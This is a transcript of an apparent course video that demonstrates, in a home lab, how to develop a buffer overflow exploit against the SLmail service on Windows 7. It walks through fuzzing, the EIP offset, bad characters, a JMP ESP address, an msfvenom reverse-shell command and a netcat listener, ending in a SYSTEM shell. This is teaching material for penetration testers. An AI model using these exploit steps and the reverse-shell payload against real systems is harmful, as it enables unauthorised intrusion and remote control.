This video is a new addition to my Udemy course, Kali Linux Hands-On Penetration Testing Labs. It will be made available to the public on both Udemy and YouTube. If you're watching this on YouTube and are interested in the course, check the description box for a link to my Udemy course with a 50% off coupon applied. This video has similar methodology to the OSCP exam in that offensive security covers exploitation such as buffer overflows. However, this material is different from theirs, so there are no spoilers for the exams or their labs. With that being said, we're going to download a free VM of 32-bit Windows 7 Enterprise. Subsequently, we will download SLmail and configure it with default settings. This will leave our Windows 7 VM vulnerable to a buffer overflow attack. Kali Linux, mona.py, and Immunity Debugger will be utilized in order to remotely identify the buffer overflow vulnerability. Then we will go through the steps of manually developing a buffer overflow that will allow us to obtain a system-level shell on the Windows 7 VM. For virtualization, we'll be using VirtualBox. Everything I just described is free. For detailed instructions on how you should set up Kali Linux, check the free video on my Udemy course. First of all, let's grab the Windows 7 VM from developer.microsoft.com. This link and all other links covered in this video are in the description box. Select IE8 on Windows 7. Platform will be VirtualBox. Download zip. Go to the download folder. Right click on the compressed file, extract here. Double click the OVA file. Click import. Click the VM we just imported, then click Start. As a best practice, I always like to take a snapshot of the VM's original state, so let's do that. Click on Machine, take Snapshot. I'm going to name it Fresh Install. Click OK. Now let's disable the Windows Firewall and Windows Update so it doesn't mess with our demonstration. To do that, click Start, type in Firewall, click Firewall under the Control Panel, turn Windows Firewall on or off, turn them both off, click OK. Click Start again, type in Update, click Windows Update, click Change Settings, click the drop down here, Never check for updates, click OK. Now let's download SLmail, Immunity Debugger, and mona.py. I loaded all of these web pages in advance. The links are supplied in the description of this video. So, go to exploit-db. I'm going to download this vulnerable app right here. This will give us SLmail. Save. Next is Immunity Debugger. It's going to be downloaded from immunityinc.com. Click this Download Immunity Debugger here. You don't have to put any real information in here, so just type in whatever you want. Download file. Retry. Just give me some problems. Okay, there it worked that time. Click save. Last but not least, let's get mona.py. So you can get that on GitHub. On the page, click download zip. Save. First, let's install SLmail. So double click the executable. Yes. Click next until you get to the end, installing with the default configuration. This is going to prompt for a restart. Click finish. Next, let's install Immunity Debugger. Double click the executable. Yes. Yes. I accept. Next. Install. This is also going to be installing Python. Click close. Launching Python installer. OK. Next. Next. Finish. Now unzip mona-master.zip. Right click, extract all, extract. Go to that folder here. So we need to copy mona.py and put it into the PyCommands folder. Here's the full path to that. It's program files, Immunity Inc., Immunity Debugger, PyCommands. So just drop that in there. Continue. Just pasted mona.py into this directory. Now let's go ahead and shut down the VM. I shut it down because I do not want to have internet connectivity anymore, and I also need to change it to the host-only adapter because that's how we're going to be communicating with the Kali Linux VM. So right-click our VM, click Settings, Network, change from attached to NAT to attached to host-only adapter. This is the same adapter I have on my Kali Linux VM. Click OK, Start. Now let's start up SLmail and attach it to Immunity Debugger. Click Start, click All Programs, SL Products, right-click SLmail Configuration, click Run as Administrator. Now click the Control tab. As we see here, it is started. Right-click Immunity Debugger. Run as administrator, click yes, click File, Attach, click SLmail, click Attach, click the play button, Now before going to Kali Linux, make sure to record your IP address of the Windows 7 VM. So open up the command prompt, type in ipconfig. For me, as you can see, it is 192.168.132.4. Now switch over to Kali Linux, open up a terminal. I'm going to go ahead and ping the Windows 7 VM to make sure we have network connectivity. Looks good. The first step in creating our buffer overflow is to see the bytes at which SLmail crashes. This will give us a framework to build the buffer overflow. Here's a fuzzing script I created. This script and all other scripts covered in this video will be available for download on my GitHub page. The link is included in the description of this video. Now let's take a look at what the script does. We create an array of buffers consisting of the A character, starting at 100. This will increment by 200 until it reaches 4,000. It has some simple while and for statements to accept command line arguments for the IP and the port. Go ahead and show you that. Here it is, sysarg 1 and 2 for the IP address and the port. Let's go ahead and close that and run it. Type in Python, fuzzer.py, the IP address of the Windows 7 machine and the port number of 110. Quick explanation of what you see here. It's sending 1A, 100 A's, 300 A's, 500 A's, and so on. And it's trying to see how many bytes it takes to crash the SLmail application. Alright, as we see here, it stops at 2900. That means that the last successful connection occurred at 2700. Let's go back to Windows 7 and check Immunity Debugger. Let's go ahead and change the font so it's a bit easier to read. So just right click, Appearance, Font, OEM Fixed Font. Same thing on the one below. Alright. So what I see here is that the EIP was successfully overwritten with 41s, which is the hexadecimal equivalent for capital A in ASCII. The fuzzer has determined that the crash occurred at approximately 2700 bytes. Using this newly acquired information, we can go ahead and use a Ruby script called pattern_create.rb to generate a unique pattern with a length of 2700. Let's go ahead and go back to Kali Linux. Go ahead and locate pattern_create. There it is. I'm going to paste that in here. Do -L for length, 2700. This will generate a unique pattern we can use to identify the location of the EIP. So go ahead and copy that. This other script I made is similar to the previous one, but more simplistic. This will send everything in the pattern variable to SLmail in one shot. Let's go ahead and paste the pattern create output into the pattern variable. Save that. Now before we go forward with running this script, we have to go back to the Windows 7 VM, exit out of Immunity Debugger, restart the SLmail service, right click, run as administrator, attach SLmail, and click the play button. And type Python, poc.py, IP address of the Windows 7 VM, and port 110. Okay, according to the script, it ran successfully. Let's go back to the Windows 7 VM. Alright, looks like we have overwritten the EIP with the value 39694438. So let's go ahead and copy that. Selection to clipboard. Head back to Kali Linux. Now we'll use another Ruby script called pattern_offset.rb. So let's go ahead and locate that. Here it is. We're going to paste that and use -q and the value which we just copied from the EIP that was overwritten earlier. Okay, so the script has determined that we have an exact match at offset 2606. So we're going to use this value in our next script to see if we can reliably control the EIP. First, we need to restart everything on Windows 7 again. We're going to have to do that every time we crash SLmail. So close out of Immunity Debugger, restart the SLmail service, run as admin, and reattach SLmail. Click play. Back to Kali Linux. Let's take a look at this next script. This is similar to the other two scripts, but it will send 2606 A's plus 4 B's plus 90 C's. Note that this is equal to the value 2700, which was determined as the approximate point at which SLmail crashed. Close out of that. Let's go ahead and run this script. So Python poc2.py, IP address of the Windows 7 VM and a port 110. Completed. As you can see here, the EIP was overwritten with 42s, which is the hexadecimal for B. This means that we can reliably control the EIP. Now we need to find if there are any bad characters. When I say bad characters, I am referring to characters that will not be rendered properly by SLmail, and therefore will not function properly when our final buffer overflow exploit is complete. This is important when we generate shellcode for our exploit. So before going back to Kali Linux, like always, we're going to have to restart SLmail and reattach it to Immunity Debugger. Let's take a look at my next script. This script is similar to the previous ones, but we'll be sending all characters to SLmail and observing if any characters aren't being rendered properly. Go ahead and close that. Type in Python poc3.py, IP of Windows 7, 1110 port. Completed. Let's head back to Windows 7. As you can see here from the output in Immunity Debugger, we have the characters 01, 02, 03, 04, and so on as a result of the script being run. Now, here's the baddies variable. These are all the characters that were sent to SLmail. So we can have them on hand and see which ones were actually rendered properly. So I see here that it was rendered properly up to 09. Now, as you can see here, it goes from 09 to 0A. This goes from 09 to 29. That means it wasn't rendered properly because we should be seeing 0A. That means that character 0A is not being rendered properly and is a bad character. So we need to remove that. Let's go ahead and remove that from our next script and run it again to see if there are any more bad characters. First off, restart Immunity Debugger and SLmail again. Back to Kali Linux. Let's take a quick look at this next script. Same thing as before, except in between 09 and 0B, you see that 0A was removed. Let's go ahead and run that. Python poc4.py, IP address of Windows 7, port 110. Back to Windows 7. Okay, so taking a look at the output on Immunity Debugger, I see that it skips from C to E. As you can see here in the list of characters, it's supposed to go from B to C to D, so that is not being rendered properly either. So far we have 0A and 0D confirmed as bad characters. Let's go ahead and remove those from the script, run it again, and see if there are any more bad characters. First, let's restart Immunity Debugger and SLmail. Let's take a quick look at this next script. So this is exactly the same as the other two scripts. However, we are not including the 0A and the 0D characters because we have confirmed that those are both bad characters. I'm going to exit out of that. Python poc5.py, IP address of Windows 7, port 110. Good. Looking at the output from Immunity Debugger, we can see here that all of the remaining characters are being rendered properly, starting from 01 and ending at FF. Now that we know the bad characters, let's go back to Kali Linux and continue the development of our exploit. Let's go ahead and restart SLmail. Fire up Immunity Debugger. Now we need to know the address for the JMP ESP. Let's go ahead and use the Ruby script nasm_shell.rb. So just locate nasm shell, paste that in there. Type in JMP ESP. Alright, so the value FFE4 is something we're going to need to know when we run the mona module script. So let's go ahead and jump back to Windows 7. In the command line at the very bottom here, type in !mona modules. Okay, so what we're looking for here is a DLL that has a value of false for rebase, safe, SEH, ASLR, and NX-compat. I see here that SLmfc.dll has all those values set to false, so we can go ahead and use that. Let's run another mona command. So mona find -s double quote \xff \xe4 double quote -m slmfc.dll. Note that FFE4 is the value that we got earlier from NASM on Kali Linux. Go ahead and run that command. Alright, so we have 19 results here, but we only need one. We can use the first one. Just click on that, right click, copy to clipboard, just the address. Now we need to generate a malicious payload using MSF Venom. So type in MSF Venom -p windows/shell _reverse _TCP lhost equals, this is going to be the IP address of your Kali Linux machine, lport equals 443 -fpy -b. These are the bad characters we want to exclude. It's going to be single quote \x00 \x0a \x0d and single quote -e. We're going to use Shikata as the encoder. Alright, so let's briefly go over what this does. This command creates a non-staged Windows reverse shell payload with a local host of 192.168.132.7, which is the Kali Linux host, file output type of Python, ignoring the bad characters we discovered, including 00, which is always going to be a bad character, and the encoder of Shikata. This will default to 32-bit. Go ahead and copy this. Let's take a look at this final script. Here's some ASCII art I added for fun. It serves no functional purpose. So we have a variable of A chars set to 2,606 A's. We have the JMP ESP address, but in reverse and in bytecode. So what we pulled off of Immunity Debugger as 5F4A358F is \x8F \x35 \x4A \x5F. We have a NOP sled of 16 \x90s, and I am going to paste the output from MSF Venom now. It's actually incorrect because I used an IP address that was set to a different IP address earlier. Okay, so this exploit will combine all of those previously mentioned variables and fire it off to SLmail. This should have all we need to get a system level reverse shell. Let's put it to the test. First, we need to go back to Windows 7 and kill Immunity Debugger and restart SLmail. This time we'll be running it without Immunity Debugger. First, we need to set up a netcat listener. To do that, type nc-nlvp443. That's the port that we specified in the MSF Venom payload. Now let's run our script. Python SLmail-exploit.py, IP address of the Windows box, and port 110. It's the good output that we wanted to see. All right, so on this other terminal here, we see that we have successfully acquired a system or administrative reverse shell. Let's go ahead and just type in host name. You see that's the host name of the Windows box. You can see IP config, same IP. Who am I? System level privileges. Good. So during this video, you learned how to develop a basic buffer overflow exploit manually by fuzzing, finding the EIP position, finding bad characters, locating the JMP ESP, generating payload with MSF Venom, and getting a reverse shell with Netcat. Thanks for watching my video. Please like this video and subscribe to my YouTube channel. For the complete course, check out my Udemy page.